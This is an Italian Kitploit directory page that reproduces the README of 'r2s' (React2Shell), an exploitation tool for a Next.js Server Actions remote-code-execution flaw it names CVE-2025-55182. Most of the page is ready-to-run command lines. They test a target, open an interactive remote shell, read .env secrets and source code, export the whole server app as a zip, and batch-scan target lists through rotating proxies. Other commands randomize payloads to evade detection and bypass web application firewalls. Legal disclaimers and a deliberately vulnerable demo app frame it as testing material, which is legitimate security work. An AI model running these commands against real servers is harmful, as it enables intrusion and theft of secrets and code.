Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
r2s — Strumento avanzato di test di sicurezza per la valutazione della vulnerabilità CVE-2025-55182 nelle applicazioni Next.js. Include shell interattiva, scansione batch, bypass WAF e reportistica completa. | Kitploit
Strumenti/GitHubGitHub/zamdevio/r2s
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniBypass WAFPenetration TestingCommand and Control
GitHubzamdevio/r2s

r2s

Strumento avanzato di test di sicurezza per la valutazione della vulnerabilità CVE-2025-55182 nelle applicazioni Next.js. Include shell interattiva, scansione batch, bypass WAF e reportistica completa.

28 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
Sito web

React2Shell (R2S) - Strumento di test per CVE-2025-55182

R2S Banner Python License

Strumento avanzato di test di sfruttamento per la valutazione della vulnerabilità CVE-2025-55182

Caratteristiche • Installazione • Utilizzo • Ambiente di test • Legale


📖 Cos'è R2S?

R2S (React2Shell) è uno strumento di test di sicurezza progettato per aiutare ricercatori di sicurezza, sviluppatori e penetration tester a valutare se le loro applicazioni Next.js sono vulnerabili a CVE-2025-55182.

Capire CVE-2025-55182

CVE-2025-55182 è una vulnerabilità critica che colpisce le Server Actions di Next.js in determinate versioni (es. 16.0.5). Questa vulnerabilità consente agli aggressori di eseguire comandi arbitrari sul server attraverso Server Actions non adeguatamente protette, portando all'esecuzione di codice remoto (RCE).

R2S ti aiuta a verificare se la tua applicazione ha questo problema in modo che tu possa risolverlo prima che malintenzionati lo scoprano.


⚠️ Note Importanti

Flag dei comandi Windows (--windows)

⚠️ AVVISO CRITICO: Il flag --windows può causare il FALLIMENTO nella determinazione della vulnerabilità se usato in modo errato.

  • Comportamento predefinito: Lo strumento utilizza comandi Unix/Linux (la maggior parte dei server Next.js funziona su Linux)
  • Quando usare --windows: Solo se sei sicuro al 100% che il server di destinazione sia Windows
  • Cosa succede se sbagli: Se usi --windows su un server Linux, i comandi falliranno e lo strumento potrebbe segnalare "non vulnerabile" anche se il server è vulnerabile
  • Buona prassi: Lascia che lo strumento rilevi automaticamente la piattaforma, oppure non usare --windows a meno che tu non sappia che il target è Windows

Esempio:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---
---

## ⚠️ Dichiarazione di non responsabilità legale

**IMPORTANTE: LEGGERE PRIMA DI USARE QUESTO STRUMENTO**

1. **Questo strumento è destinato ESCLUSIVAMENTE a test di sicurezza LEGITTIMI**
   - ✅ Testare le proprie applicazioni
   - ✅ Testare applicazioni per cui si ha ricevuta autorizzazione scritta
   - ✅ Scopi educativi e ricerca sulla sicurezza
   - ❌ **MAI usare su sistemi di cui non si è proprietari o per cui non si ha autorizzazione**
   - ❌ **MAI usare per scopi malevoli**

2. **Usando questo strumento, dichiari di:**
   - Utilizzarlo solo su sistemi di cui sei proprietario o per cui hai esplicita autorizzazione scritta
   - Comprendere che l'accesso non autorizzato a sistemi informatici è illegale
   - Accettare la piena responsabilità per le tue azioni
   - Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento

3. **Conseguenze legali:**
   - L'accesso non autorizzato a sistemi informatici è un reato nella maggior parte dei paesi
   - Potresti incorrere in accuse penali, multe e reclusione
   - Ottieni sempre un'autorizzazione scritta prima di testare

4. **Questo strumento è fornito "COSÌ COM'È" senza alcuna garanzia**

**Se hai meno di 18 anni, assicurati di avere supervisione e autorizzazione di un adulto prima di utilizzare questo strumento.**

---

## ✨ Caratteristiche

### Capacità principali
- 🔍 **Rilevamento vulnerabilità** - Testa rapidamente se un server è vulnerabile a CVE-2025-55182
- 💻 **Shell interattiva** - Sessione shell interattiva completa su HTTPS con cronologia comandi
- 📁 **Operazioni sui file** - Elenca directory, legge file ed esporta file/archivi
- 🔐 **Estrazione segreti** - Tenta di leggere segreti delle applicazioni (file .env, file di configurazione)
- 📄 **Estrazione codice** - Tenta di leggere il codice sorgente dell'applicazione
- 🖥️ **Informazioni sistema** - Raccoglie informazioni SO, hostname, utente e variabili d'ambiente

### Funzionalità avanzate
- 🚀 **Payload di auto-riscaldamento** - Ottimizza automaticamente i payload per risultati migliori
- ⚡ **Esecuzione parallela** - Esegui più comandi simultaneamente
- 🎲 **Randomizzazione payload** - Evita il rilevamento con payload dinamici
- 🛠️ **Moduli di exploit** - Sistema di moduli stile Metasploit (env_dump, file_search, network_scan, process_list)
- 🔄 **Gestione reindirizzamenti** - Segue automaticamente i reindirizzamenti HTTP (301, 302, 303, 307, 308)
- 🎨 **Interfaccia grafica** - Output con codifica colore per una facile lettura
- 📊 **Reportistica completa** - Salvataggio automatico dei report in formato JSON, HTML, TXT con formattatori specifici per operazione
- ⚙️ **Sistema di configurazione** - Configurazione basata su JSON con pannello interattivo delle impostazioni
- 📦 **Funzionalità di esportazione** - Esporta singoli file o intere directory dell'app come archivi zip
- 🔒 **Bypass WAF** - Multiple tecniche di bypass (⚠️ Non garantito - vedi limitazioni sotto)

### Reportistica e logging
- 📝 **Salvataggio automatico report** - Salva automaticamente i report in `~/.r2s/reports/` con timestamp leggibili
- 📋 **Formati specifici per operazione** - Formati di report diversi per operazioni diverse (shell, test, segreti, ecc.)
- 📜 **Cronologia comandi** - Cronologia comandi persistente salvata in `~/.r2s/history`
- 🔍 **Trail di audit** - Log dettagliati di tutte le operazioni in `~/.r2s/logs/audit.log`
- 🎨 **Report HTML** - Belli report HTML con modalità chiara/scura, pulsanti di copia e blocchi di codice

---

## 📦 Installazione

### Opzione 1: Compilazione dal sorgente (Consigliata)

1. **Clona il repository:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. Installa le dipendenze: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. Costruisci il binario autonomo: ```bash ./build.sh
    root@kitploit:~
  3. Installazione nel sistema (opzionale): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. Pulisci gli artefatti di build (opzionale): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

Opzione 2: Usa lo script Python direttamente```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---

## 🚀 Avvio Rapido

### Test di vulnerabilità di base```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ Importante: Non utilizzare --windows a meno che tu non sia certo che il target sia Windows. L'uso di --windows su un server Linux causerà falsi negativi (lo strumento potrebbe segnalare "non vulnerabile" anche se il server è vulnerabile).

Test con Demo Online

Forniamo un ambiente di test sicuro su **https://r2s-arena.fly.dev**:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### Testa Localmente

Vedi [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) per le istruzioni su come eseguire l'app vulnerabile localmente.

---

## 📚 Esempi di Utilizzo

### Riferimento Rapido ai Comandi

**Comandi più Comuni:**
- `r2s -u URL -t` - Test per vulnerabilità (il più comune)
- `r2s -u URL --shell` - Avvia shell interattiva
- `r2s --targets FILE -t` - Scansione batch di più target
- `r2s -u URL --system-info` - Ottieni informazioni di sistema
- `r2s -u URL --secrets` - Tenta di leggere i segreti
- `r2s -u URL --export-archive` - Esporta l'intera app come zip

**⚠️ Ricorda**: Non usare `--windows` a meno che il target non sia Windows!

---

### Operazioni di Base```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

Shell interattiva```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### Moduli Exploit```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

Funzionalità di esportazione```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### Segreti & Estrazione del codice```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

Scansione batch (Target multipli)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### Opzioni Avanzate```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

Proxy & Opzioni di Rete```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### Registrazione & Audit```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

Impostazioni & Configurazione```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### Segnalazione```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 Casi d'uso comuni

1. Testare la propria applicazione```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. Audit di sicurezza```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. Test Educativi

Utilizza l'applicazione nextjs fornita per test sicuri e locali:```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
Vedi [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) per istruzioni dettagliate.

---

## 🏗️ Architettura

R2S utilizza un'architettura modulare per manutenibilità ed estensibilità:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

Vedi react2shell/README.md per la documentazione dettagliata dell'architettura.


🧪 Ambiente di Test

Forniamo un ambiente di test sicuro chiamato nextjs che puoi utilizzare per testare lo strumento senza rischiare sistemi reali.

Demo Online

Visita: https://r2s-arena.fly.dev

Questa è un'applicazione pubblicamente accessibile, intenzionalmente vulnerabile, solo per scopi di test.

Test Locale

Vedi nextjs/README.md per le istruzioni su come eseguirlo localmente.

⚠️ Importante: L'applicazione nextjs è intenzionalmente vulnerabile e NON DEVE MAI essere utilizzata in produzione o con dati reali.


📖 Riferimento dei Comandi

Comandi di Base

Comandi di Esportazione

ComandoDescrizione
--export FILE, --ex FILEEsporta un singolo file dal target (salvato in ~/.r2s/exports/{domain}/)
--export-archiveEsporta l'intera directory dell'app come archivio zip. Crea zip sul server, lo scarica, quindi lo elimina dal server. Esclude i pattern .gitignore. Salvato in ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Comandi dei Moduli

ComandoDescrizione
--module NAMEEsegue il modulo exploit
--module-list, --list-modulesElenca i moduli disponibili

Opzioni Avanzate

Opzioni di Reportistica

OpzioneDescrizione
--output FILE, -o FILE

Opzioni di Rete e Proxy

Opzioni Batch e Automazione

OpzioneDescrizione
--targets FILEScansiona più target da un file (un URL per riga, supporta commenti con #)
--batchModalità batch: salta tutti i prompt interattivi, continua automaticamente (utile per automazione/script)

Comandi Speciali

ComandoDescrizione
r2s settingsApre il pannello delle impostazioni interattivo

🔧 Risoluzione dei Problemi

"Errore SSL"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "Errore di connessione"
- Verifica che il server sia in esecuzione
- Verifica che l'URL sia corretto
- Controlla le impostazioni del firewall
- Prova ad aumentare il timeout: `--timeout 30`

### "Richiesta bloccata"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"Impossibile Determinare la Vulnerabilità" o Falsi Negativi

⚠️ IMPORTANTE: Flag dei Comandi Windows

Se stai ottenendo falsi negativi (lo strumento dice "non vulnerabile" ma il target in realtà lo è), controlla:

  1. Hai usato il flag --windows?

    • Il flag --windows fa sì che lo strumento usi comandi Windows (PowerShell, dir, ecc.)
    • Se il tuo target è Unix/Linux (la maggior parte dei server Next.js lo sono), usare --windows farà FALLIRE lo strumento
    • Lo strumento proverà a eseguire comandi Windows su un server Linux, fallendo
    • Soluzione: Rimuovi il flag --windows (Unix/Linux è l'impostazione predefinita)
  2. Rilevamento della Piattaforma

    • Lo strumento rileva automaticamente la piattaforma, ma puoi sovrascriverla
    • Usa --windows solo se sei sicuro al 100% che il target sia Windows
    • La maggior parte delle distribuzioni Next.js sono su sistemi Linux/Unix
  3. Comando di Test

    • Il test predefinito usa il comando Unix: echo $((41*271))
    • Con --windows, usa: powershell -c "41*271"
    • Se il server è Linux ma usi comandi Windows, il test fallirà

Esempio del problema:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### Limitazioni dell'elusione WAF

**⚠️ Importante:** Le tecniche di elusione WAF in questo strumento **NON sono garantite** e presentano diverse limitazioni:

- **Non universali**: WAF diversi utilizzano metodi di rilevamento differenti. Ciò che funziona per uno potrebbe non funzionare per un altro.
- **Rilevamento statico**: Alcuni WAF utilizzano il pattern matching statico che può essere eluso, ma i WAF moderni utilizzano l'analisi comportamentale.
- **Rate limiting**: Molti WAF implementano limiti di frequenza che possono bloccare tentativi ripetuti.
- **Apprendimento automatico**: I WAF avanzati utilizzano modelli di ML che si adattano e imparano dai pattern di attacco.
- **Cloudflare/AWS WAF**: I WAF di livello enterprise (Cloudflare, AWS WAF, ecc.) sono estremamente difficili da eludere.
- **Nessuna garanzia**: Le tecniche di elusione sono sperimentali e potrebbero fallire contro WAF ben configurati.

**Buone pratiche:**
- Utilizza l'elusione WAF come ultima risorsa
- Prova diverse strategie di header (`--header-strategy`)
- Combina con `--randomize` per ottenere risultati migliori
- Comprendi che alcuni target potrebbero essere impossibili da eludere
- Testa sempre su sistemi di tua proprietà o per cui hai autorizzazione

### Problemi di build```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

Pulizia degli artefatti di build

Per rimuovere in sicurezza tutti gli artefatti di build (directory di build, file di cache, ecc.):```bash ./build.sh cleanup

root@kitploit:~
Questo rimuoverà:
- `build/` directory (file di build di PyInstaller)
- `dist/` directory (binari compilati)
- `__pycache__/` directories (cache Python, ricorsivamente)
- `*.pyc` files (bytecode Python compilato)
- `*.pyo` files (bytecode Python ottimizzato)
- `*.spec` files (file spec di PyInstaller)

**Nota:** Questo rimuove solo gli artefatti di build, non il tuo codice sorgente. La pulizia è sicura e chiederà conferma prima di procedere.

---

## 📁 Struttura dei File```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 Contribuire

Contributi sono benvenuti! Per favore:

  1. Fai il fork del repository
  2. Crea un branch per la feature
  3. Apporta le tue modifiche
  4. Invia una pull request

Ricorda: Contribuisci solo con codice che aiuti nei test di sicurezza legittimi.


📝 Licenza

Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli.

Tuttavia, l'uso di questo strumento è soggetto alla clausola di esonero di responsabilità sopra. L'utilizzo di questo strumento per accessi non autorizzati è illegale e non coperto da questa licenza.


👨‍💻 Sviluppatore

zamdevio

  • GitHub: https://github.com/zamdevio
  • Repository del progetto: https://github.com/zamdevio/r2s

🙏 Riconoscimenti

  • Ricercatori di sicurezza che hanno scoperto CVE-2025-55182
  • La comunità di sicurezza open-source
  • Tutti i contributori di questo progetto

📞 Supporto

  • Problemi: GitHub Issues
  • Sicurezza: Segnala i problemi di sicurezza in modo responsabile

⚠️ Promemoria Finale

Questo strumento è SOLO per test di sicurezza e scopi educativi.

  • ✅ Ottieni sempre il permesso prima di testare
  • ✅ Testa solo sistemi di tua proprietà o per i quali hai il permesso
  • ✅ Usa in modo responsabile ed etico
  • ❌ Non usare mai per scopi malevoli
  • ❌ Non testare mai sistemi senza permesso

Rimani legale, rimani etico, rimani al sicuro! 🛡️


Realizzato con ❤️ per la comunità della sicurezza

⬆ Torna all'inizio

Scarica lo strumento
ComandoDescrizione
-u, --url URLURL di destinazione (richiesto per la maggior parte delle operazioni)
-t, --testVerifica se il server è vulnerabile
-ld, --list-dir PATHElenca il contenuto della directory
-rf, --read-file FILELegge il contenuto del file
-si, --system-infoOttiene informazioni di sistema
-sr, --secretsTenta di leggere i segreti
-c, --codeTenta di leggere il codice sorgente
-cmd, --command CMDEsegue un comando personalizzato
--shellAvvia una shell interattiva
--module-info NAMEMostra le informazioni del modulo
--set KEY=VALUEImposta opzione del modulo
OpzioneDescrizione
--waf-bypassProva tecniche di bypass WAF (⚠️ Non garantito - vedi limitazioni sotto)
--waf-bypass-size KBDimensione dei dati spazzatura per bypass WAF in KB (default: 128)
--vercel-waf-bypassAbilita tecniche di bypass WAF specifiche per Vercel
--header-strategy STRATEGYStrategia per gli header HTTP: default, chrome_latest, firefox, minimal, assetnote
--parallel NEsegue N comandi in parallelo (utile per comandi multipli)
--auto-warmRiscalda e ottimizza automaticamente i payload prima dell'esecuzione
--randomizeRandomizza i payload per eludere il rilevamento statico
--no-follow-redirectsNon seguire automaticamente i redirect HTTP (301, 302, ecc.)
-k, --insecureDisabilita la verifica del certificato SSL (usa con cautela)
--timeout SECONDSTimeout della richiesta in secondi (default: 10, usa 0 per nessun timeout)
--windows⚠️ AVVISO: Usa comandi Windows invece di Unix/Linux. Questo può far fallire la determinazione della vulnerabilità se il target è effettivamente Unix/Linux. Usalo solo se sei certo che il target sia Windows.
--rate RATELimita le richieste a RATE richieste al secondo (utile per scansioni batch)
--delay SECONDSAggiunge un ritardo tra le richieste in secondi (aiuta a evitare il rate limiting)
--batchModalità batch: salta tutti i prompt interattivi, continua automaticamente (utile per automazione)
Salva i risultati in un file specifico (disabilita il salvataggio automatico)
--no-reportDisabilita il salvataggio automatico del report in ~/.r2s/reports/
--log FILERegistra tutte le operazioni in un file specificato (log dettagliato delle operazioni)
--auditCrea un audit trail dettagliato (salvato in ~/.r2s/logs/audit.log)
OpzioneDescrizione
--proxy URLUsa proxy HTTP (formato: http://proxy:porta o http://utente:password@proxy:porta)
--proxy-file FILECarica e ruota i proxy da un file (un proxy per riga, formato: http://proxy:porta)
--rate RATELimita le richieste a RATE richieste al secondo (previene il sovraccarico del target)
--delay SECONDSAggiunge un ritardo tra le richieste in secondi (aiuta a evitare il rate limiting)
r2s cleanup
Elimina tutti i dati R2S (config, cronologia, log, report, esportazioni)
r2s uninstallDisinstalla il binario R2S e tutti i dati
r2s helpMostra il messaggio di aiuto